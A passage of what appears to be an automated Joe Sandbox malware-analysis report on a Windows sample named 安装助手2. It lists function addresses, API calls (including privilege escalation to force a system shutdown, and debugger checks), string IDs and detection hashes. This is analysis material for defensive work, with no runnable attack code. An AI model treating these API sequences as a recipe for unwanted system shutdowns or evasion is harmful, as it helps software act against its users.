                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: g)''
                            • API String ID: 4218353326-3487984327
                            • Opcode ID: 79e1c2535bce03d90f969d8ae9e6aec5ea39e46beab893da8468d4339aaa79e8
                            • Instruction ID: 9610d62b192f5c5e3e4a8e95efb3f65787308d9ed2c6f25f90adab724ec18282
                            • Opcode Fuzzy Hash: 79e1c2535bce03d90f969d8ae9e6aec5ea39e46beab893da8468d4339aaa79e8
                            • Instruction Fuzzy Hash: 74632431644B018FC728CF28C8D0B99B7F3EF853187698A6DC0E65BA55EB75B54ACB40
                            Function 6C0B62D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 31nativeshutdownCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 6C0B62DA
                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C0B62E6
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C0B62F4
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C0B631B
                            • NtInitiatePowerAction.NTDLL ref: 6C0B632F
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3256374457-3733053543
                            • Opcode ID: 14f78f7a2d27e1f6f305f6bb0e4c284f41015081fd4e7ada05f48124d5fcd46a
                            • Instruction ID: ab7c4f771b133eb0192f17f72467a7c513df25ed5468bc7b7af7d094a35b918a
                            • Opcode Fuzzy Hash: 14f78f7a2d27e1f6f305f6bb0e4c284f41015081fd4e7ada05f48124d5fcd46a
                            • Instruction Fuzzy Hash: 9FF0B470644300BFEA006B24CD0EB5A7BF4EF45701F018608F985A60C1DB706894DF96
                            Function 6BF31950 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 594COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: \j`7$\j`7$j
                            • API String ID: 0-3644614255
                            • Opcode ID: 585557aeab70aacfc5f2ba7b9dfbd61afc335d62f4debd3b680460f93aa197cb
                            • Instruction ID: eea4123f5518ad940109ef53c5cce7a019a2473dcd2c710a312833e5bca54af6
                            • Opcode Fuzzy Hash: 585557aeab70aacfc5f2ba7b9dfbd61afc335d62f4debd3b680460f93aa197cb
                            • Instruction Fuzzy Hash: 4A424476A093A2CFCB14CF28C49065ABBE1ABC9354F14495EE4D5CB360D339D945CBA3
                            Function 6C1484AC Relevance: 8.7, APIs: 1, Strings: 3, Instructions: 1656COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C1484B1
                              • Part of subcall function 6C14993B: __EH_prolog.LIBCMT ref: 6C149940
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 1$`)K$h)K
                            • API String ID: 3519838083-3935664338
                            • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                            • Instruction ID: 6e76c75886d43baae6fdd511ebbda00df42d07ed4a2e25326e5b44a7b7dc3350
                            • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                            • Instruction Fuzzy Hash: 53F28C70901248DFDB11CFA8C994BDDBBB5AF99308F28809AE449EB781D7749E85CF50
                            Function 6C13AEEF Relevance: 8.3, APIs: 1, Strings: 2, Instructions: 3058COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C13AEF4
                              • Part of subcall function 6C13E622: __EH_prolog.LIBCMT ref: 6C13E627
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $h%K
                            • API String ID: 3519838083-1737110039
                            • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                            • Instruction ID: 51d3e8632b342ba401a0b07c1bd909e77f12615f2a4f3659599f78f9100e0b43
                            • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                            • Instruction Fuzzy Hash: B2539830901268DFDF15DBA4C894BDDBBB4AF1930CF2440D8D459AB691DB34AE89CF61
                            Function 6C116CE0 Relevance: 5.4, APIs: 1, Strings: 1, Instructions: 1923COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C116CE5
                              • Part of subcall function 6C0ECC2A: __EH_prolog.LIBCMT ref: 6C0ECC2F
                              • Part of subcall function 6C0EE6A6: __EH_prolog.LIBCMT ref: 6C0EE6AB
                              • Part of subcall function 6C116A0E: __EH_prolog.LIBCMT ref: 6C116A13
                              • Part of subcall function 6C116837: __EH_prolog.LIBCMT ref: 6C11683C
                              • Part of subcall function 6C11A143: __EH_prolog.LIBCMT ref: 6C11A148
                              • Part of subcall function 6C11A143: ctype.LIBCPMT ref: 6C11A16C
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog$ctype
                            • String ID:
                            • API String ID: 1039218491-3916222277
                            • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                            • Instruction ID: d1d15ad61cea302b56be09ef2690b6553dbf3e0cc13fabbae8a7daee5a11edfd
                            • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                            • Instruction Fuzzy Hash: 87039D30809298DFDF15CFA4C950BDCBBB1AF19318F2480AAD44567B91DB786B8DCB61
                            Function 6C16C580 Relevance: 5.2, Strings: 4, Instructions: 153COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: 3J$`/J$`1J$p0J
                            • API String ID: 0-2826663437
                            • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                            • Instruction ID: c245b2524776a1bc5f7fc3670c5758cbee2645ca7ba1f00f127c2cd777d104fe
                            • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                            • Instruction Fuzzy Hash: 42410A71F109600AF3488E7A8C855667FC3C7C9346B4AC23DD575C76D9DA7DC40786A4
                            Function 6C140A52 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1212COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: W
                            • API String ID: 3519838083-655174618
                            • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                            • Instruction ID: f4a166ec71df3ed5c4374f28202db7fc7ce80edc0199df113f708a299bf8ffdb
                            • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                            • Instruction Fuzzy Hash: 67B27974A01259DFDB00CFA8C888B9EBBB5BF59318F248099E849EB741C775ED51CB60
                            Function 6C0C06F1 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C0C07E9
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C0C07F3
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C0C0800
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: 8a54689cf65ba9e7c8f7f561f4f452b0a3a9a6f0feccd6234e2786cebf517e4c
                            • Instruction ID: 7d0fd3e4caf31eae95820d8e932577a8f103e305ba6f2c4405efc4052926b677
                            • Opcode Fuzzy Hash: 8a54689cf65ba9e7c8f7f561f4f452b0a3a9a6f0feccd6234e2786cebf517e4c
                            • Instruction Fuzzy Hash: B931907590121CABCF61DF64D888B8DBBF8AF08714F5042EAE41CA7250EB709B858F45
                            Function 6C0BF6ED Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,6C0BF7A5,?,?,?,?), ref: 6C0BF70F
                            • TerminateProcess.KERNEL32(00000000,?,6C0BF7A5,?,?,?,?), ref: 6C0BF716
                            • ExitProcess.KERNEL32 ref: 6C0BF728
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 1ff351e8aab5f7eed733b5618cca7bc10cd70edfcfa748821bac1c98fa3eaff5
                            • Instruction ID: 8de57c76b195938a70b92fcc167f1c451dd625317d99b3532d5317470a39e918
                            • Opcode Fuzzy Hash: 1ff351e8aab5f7eed733b5618cca7bc10cd70edfcfa748821bac1c98fa3eaff5
                            • Instruction Fuzzy Hash: 56E0123A184108EBCF41ABD5C848B893BB8EB49A45B114454F804A7621CF36EA81CA81
                            Function 6C134896 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 333COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C13489B
                              • Part of subcall function 6C135FC9: __EH_prolog.LIBCMT ref: 6C135FCE
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @ K
                            • API String ID: 3519838083-4216449128
                            • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                            • Instruction ID: f3c84ce53e0656e4cf6ec8b686a0a2900f8835d7be8a7aa2c966be0f78d75dfe
                            • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                            • Instruction Fuzzy Hash: 9AD1CD31E042248FDB14CFA4C49079EBFB6BF9431CF14916AE419ABB88CB769885CB55
                            Function 6C0E8EA1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: x=J
                            • API String ID: 3519838083-1497497802
                            • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                            • Instruction ID: 2b40f079ce18dd4439a958fd79d6dc4fd55820f4318ae9f8dcf89a530b5c68a0
                            • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                            • Instruction Fuzzy Hash: 6791F231D812199ECF04DFA8C890BEDB7F1BF4D348F64816ED46167A90DB326989CB50
                            Function 6C0B6FB3 Relevance: 3.3, APIs: 2, Instructions: 302COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C0B7E20
                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C0B8643
                              • Part of subcall function 6C0B98E9: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C0B862C,00000000,?,?,?,6C0B862C,?,6C0E555C), ref: 6C0B9949
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                            • String ID:
                            • API String ID: 915016180-0
                            • Opcode ID: 74ddff040bbdc4ab5f7aa48118472a4e15bc5031bc666592604684813f40eaac
                            • Instruction ID: 33e2c49c53da8fa321587719f5d429f80c116d5b739f2fd11b154c8a1ddd70bc
                            • Opcode Fuzzy Hash: 74ddff040bbdc4ab5f7aa48118472a4e15bc5031bc666592604684813f40eaac
                            • Instruction Fuzzy Hash: F9B1BC71A002069BCF09CF65C88179EBBF4FB09318F64822AD416F7790E735A959DF94
                            Function 6C152521 Relevance: 2.6, APIs: 1, Instructions: 1105COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                            • Instruction ID: 6a0ef9c83beed65d14636e73f220fc9426f1954604509977aef8987aa83aa2b5
                            • Opcode Fuzzy Hash: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                            • Instruction Fuzzy Hash: 2BB2CFB1A04758CFCB21CFA8C494BDEBBF1BF15308F908199D4AAA7A41D770A995CF50
                            Function 6C0E8972 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: @4J$DsL
                            • API String ID: 0-2004129199
                            • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction ID: 31e19cdc31ef9f8150c9cbce63e8348f22afb6955dbd8e3cc03fca2c0614f809
                            • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction Fuzzy Hash: 6B217137AA49564BE74CCA68DC33EB926C1E744305B89527EE94BCB7D1DF5D8800CA48
                            Function 6C1867C0 Relevance: 1.7, Strings: 1, Instructions: 468COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                            • Instruction ID: 3be8faaaf8e1cbe6db1bb02476648a9803f8ae5d6036f7bc2a917419fce21e93
                            • Opcode Fuzzy Hash: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                            • Instruction Fuzzy Hash: 3C1207B29083158FC358DF4AD44045BF7E2BFC8714F1A8A6EE898A7311D770E9568BC6
                            Function 6C0F0BCA Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: __aullrem
                            • String ID:
                            • API String ID: 3758378126-0
                            • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction ID: c7ba4d9da658f59a9202860462f2f3e0abaf438eeff636cf5fd6c07d27d78321
                            • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction Fuzzy Hash: DF51C871B092859BD710CF5AC4C06EEFBE6AF79214F18C05AE8C897242D27A599BC760
                            Function 6C186999 Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                            • Instruction ID: 4c33445abe11c437492ef8be4bec18a5968981867bbd862113831d320078cce6
                            • Opcode Fuzzy Hash: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                            • Instruction Fuzzy Hash: 37D13E729083148FC758DF4AD44005BF7E2BFC8314F1A892EF899A7315DB70A9568BC6
                            Function 6C0EC7CF Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: (SL
                            • API String ID: 0-669240678
                            • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                            • Instruction ID: 472a051db6b0b2b342244b1e3efa9f5fe28c7488ab6b9b259ebd6dd09c82e404
                            • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                            • Instruction Fuzzy Hash: 12519473E208214AE78CCE24DC2177572D2E784310F8BC1B99D8BAB6E6CD78989087C4
                            Function 6C15AB90 Relevance: .9, Instructions: 940COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                            • Instruction ID: 522c7aa4d5e628aa0643221512a7926dc578f72d934983212720e088a2642022
                            • Opcode Fuzzy Hash: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                            • Instruction Fuzzy Hash: AB728DB16042168FD748CF18C490268FBE1FF89314B9A46ADD96ADB742DB70E8D5CBD0
                            Function 6C17A930 Relevance: .7, Instructions: 740COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                            • Instruction ID: 3c9c267460d450b3085d4f5f77eff2514ae5b65f049c4aad2c8ecce376e19717
                            • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                            • Instruction Fuzzy Hash: 6A6204B1A093448FC724CF19C58061AFBF6BFD8744F248A6EE89987714D770E845CBA2
                            Function 6C178950 Relevance: .7, Instructions: 697COMMON
                            Download Yara Rule
                            Memory Dump Source
